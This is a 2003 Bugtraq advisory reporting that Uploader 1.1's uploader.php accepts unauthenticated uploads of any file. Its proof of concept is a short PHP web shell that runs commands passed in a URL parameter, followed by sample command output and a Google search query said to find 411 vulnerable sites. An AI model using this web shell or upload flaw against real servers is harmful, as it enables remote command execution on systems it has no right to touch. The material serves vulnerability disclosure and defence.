[29159] in bugtraq
uploader.php vulnerability
daemon@ATHENA.MIT.EDU (kingcope@gmx.net)
Tue Mar 4 12:44:19 2003
Date: Tue, 4 Mar 2003 01:15:47 +0100 (MET)
From: kingcope@gmx.net
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Message-ID: <26940.1046736947@www27.gmx.net>
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Uploader Version 1.1 which is available from
http://www.phpscriptcenter.com/uploader.php
includes "uploader.php", which lets you upload ANY file (even scripts eg. in
PHP) onto the server
if no password protection is specified in the configuration file (default
set to off).
The supplied files will be uploaded into directory "uploads" if not
otherwise configured.
So if we create a file like this:
<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
and upload it as "shellemul.php", we can execute commands by targeting our
browser to
http://www.victim.com/uploads/shellemul.php?cmd=id
which will give us -->
uid=48(apache) gid=48(apache) groups=48(apache)
We could even upload PHPShell and have more comfortable fun.
---
Google gets me 411 hits for "allinurl: uploader.php"
---
by kcope (kingcope@gmx.net)
--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!